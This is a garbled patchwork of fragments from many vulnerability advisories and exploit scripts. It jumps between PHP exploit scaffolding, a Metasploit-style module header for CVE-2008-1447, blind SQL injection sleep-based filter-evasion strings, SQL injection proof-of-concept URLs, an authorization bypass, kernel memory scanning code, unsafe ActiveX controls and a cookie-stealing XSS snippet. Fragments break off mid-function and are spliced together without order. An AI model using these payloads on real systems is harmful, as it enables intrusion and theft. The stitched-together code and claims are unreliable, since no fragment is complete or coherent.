vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:
...
require_once '../../lib-common.php';
if (PHP_VERSION < 5) {
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
my_header();
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
function main()
{
$this->mhead();
# Gimme your args
$this->p_attack = $this->get_p('attack', true);
$this->p_prox = $this->get_p('proxhost');
$this->p_proxa = $this->get_p('proxauth');
$this->init_global();
/* check readable */
if ( IsBadReadPtr ( base , 1 ) == FALSE )
{
/* set flag */
r = TRUE;
}
/* check writeable */
if ( IsBadWritePtr ( base , 1 ) == FALSE )
{
/* set flag */
[
[ 'CVE', '2008-1447' ],
[ 'US-CERT-VU', '8000113' ],
[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],
],
'Privileged' => true,
'Targets' =>
[
["BIND",
{
'Arch' => ARCH_X86,
Special thanks to Reiners for this sqli filter evasion cheat sheet:
http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
Here are some changes I had to make to my blind sql injection class:
"select substring('abc',1,1)"=>"select substring('abc' from 1 for 1)"
if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)" =>"case ".sprintf($question,"0+".$cur).">".$pos." when true then sleep(".$this->timeout.") end"
CWE Violations leveraged by this exploit:
CWE-256: Plaintext Storage of a Password
CWE-804: Guessable CAPTCHA (I asked that they create this CWE when I ran into a guy that works for Mitre.)
CWE-89: SQL Injection x2
> [
> [ 'CVE', '2008-1447' ],
> [ 'US-CERT-VU', '8000113' ],
> [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],
> ],
> 'Privileged' => true,
> 'Targets' =>
> [
> ["BIND",
> {
> 'Arch' => ARCH_X86,
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
nil;
} else {
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
extract($HTTP_GET_VARS);
}
This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application. Setting the variable to one
bypasses the first check ($demoSession != true), but the second boolean
expression ($demoSession == 'true') evaluates to false, thereby not
initializing the action variable to an empty string.
// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
$A['showonline'] = 1;
} else {
$A['showonline'] = 0;
}
$A['maxstories'] = COM_applyFilter ($A['maxstories'], true);
if (empty ($A['maxstories'])) {
$A['maxstories'] = 0;
} else if ($A['maxstories'] > 0) {
if ($A['maxstories'] < $_CONF['minnews']) {
$A['maxstories'] = $_CONF['minnews'];
for( pos=0x80000000; pos<0xfffff000; pos=pos+0x1000 )
{
ret = ReadKernelMemory( (void*) (pos+0x0ea), (void*) buffer, 5 ); /*
Read the complete block */
if ( ret == TRUE )
{
if ( memcmp(buffer, pattern, 5) == 0 )
{
/* If match */
code_address = pos + 0x0ea;
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
$result = curl_exec($ch);
curl_close($ch);
$result = str_replace("\n", "", $result);
preg_match("/(Wat zit er in uw winkelwagen.*)<\/table>/", $result,
~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
    // onsubmit handler for frmDisplay: appends a fixed displays.asp query path to
    // whatever the text field named URL holds and points the form at it, then lets
    // the submit proceed (always returns true).
    // _action is assigned without var, so it becomes a global, as before.
    // Relies on document.all (legacy IE-only collection) and on a field named URL.
    _action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1';
    var base = window.document.all.URL.value;
    frmDisplay.action = base + _action;
    return true;
}
</script>
URL: <input type="text" name="URL" />
<form name="frmDisplay" action="" method="post" onsubmit="return check()">
<input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
#######################################################################
Luigi Auriemma
Application: Acronis True Image Windows Agent
http://www.acronis.com/enterprise/products/ATIES/windows-agent.html
Versions: <= 1.0.0.54
(included in Acronis True Image Enterprise Server
9.5.0.8072 and the other True Image packages)
Platforms: Windows
#ifdef WIN32
#include <windows.h>
#include <io.h>
#else
typedef long long ULONG64;
#define TRUE (-1)
#define FALSE (0)
#endif
#include <stdio.h>
#include <time.h>
#fcms_login_pw=your_real_pass
#
#fcms_login_id=your_real_id+and+1=1
#
#
#(Delete PHPSESSID) Result: True --> Show page
#
#
#fcms_login_user=your_real_name
#
#fcms_login_pass=your_real_pass
Type: ActiveX-Control
Version: 1.6.0.6
GUID: {0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
File: IDAutomationLinear6.dll
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init: True
Name: IDautomation PDF417 Barcode
Vendor: IDAutomation.com Inc.
*length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out;
ipcomp = realloc(ipcomp, *length);
free(data);
return true;
}
int main(int argc, char **argv)
{
int s;
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
Thanks to the getIP() function, if we know the
Type: ActiveX-Control
Version: 1.1.2200.0
GUID: {1E57C6C4-B069-11D3-8D43-00104B138C8C}
File: keyhelp.ocx
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init: False
Name: KeyScript Class
Vendor: KeyWorks Software
#######################################################################
Luigi Auriemma
Application: Acronis True Image Group Server
http://www.acronis.com/enterprise/products/ATIES/group-server.html
Versions: <= 1.5.19.191
(included in Acronis True Image Enterprise Server
9.5.0.8072 and the other True Image packages)
Platforms: Windows
/webtemp/functions/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
// NOTE(review): the connector is switched on here while the warning directly above
// asks for an authentication or session check; no such check is visible in this
// excerpt, so anyone who can reach this path can presumably use the file-manager
// operations behind it. Keep this false unless access is gated upstream — confirm.
---
*s SystemUnit Software Version: "TC4.0"
*s SystemUnit Software Name: "s52000"
*s SystemUnit Software ReleaseDate: "2010-11-01"
*s SystemUnit Software MaxVideoCalls: 3
*s SystemUnit Software MaxAudioCalls: 4
*s SystemUnit Software ReleaseKey: "true"
*s SystemUnit Software OptionKeys NaturalPresenter: "true"
*s SystemUnit Software OptionKeys MultiSite: "true"
*s SystemUnit Software OptionKeys PremiumResolution: "true"
*s SystemUnit Hardware Module SerialNumber: "B1AD25A00003"
*s SystemUnit Hardware Module Identifier: "0"
/* evil script */
var $xss='alert("PWN PWN PWN: " + document.cookie);';
function
cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
$this->headers[] = 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type:
application/x-www-form-urlencoded;charset=UTF-8';
In recent research I have done, I found that
60% of the PHP scripts which support Oracle aren't safe!
People think that if they use the function addslashes()
on a string which has quotes, they'll be secured
against SQL Injection. On MySQL that's roughly true, but
on Oracle that's wrong.
The escape character for MySQL is a backslash, \x92[\].
The escape character for Oracle is a single quote, \x39['].
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
}
default:
..
}
return true;
}
--------------------------------------------------------------------------------------------------------------------
~/xoops-1.3.10/class/phpsyndication.lib.php
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.display_debug_console.php $smarty->_include($_compile_path);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_plugins.php include_once
$_plugin_file;
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_resource_plugin.php include_once($_plugin_file);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_cached_inserts.php $smarty->_include($php_resource,
true);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php function
smarty_core_process_compiled_include($params, &$smarty)
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php $smarty->_include($_include_file_path,
true);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.run_insert_handler.php $smarty->_include($_params['php_resource'],
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
#
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE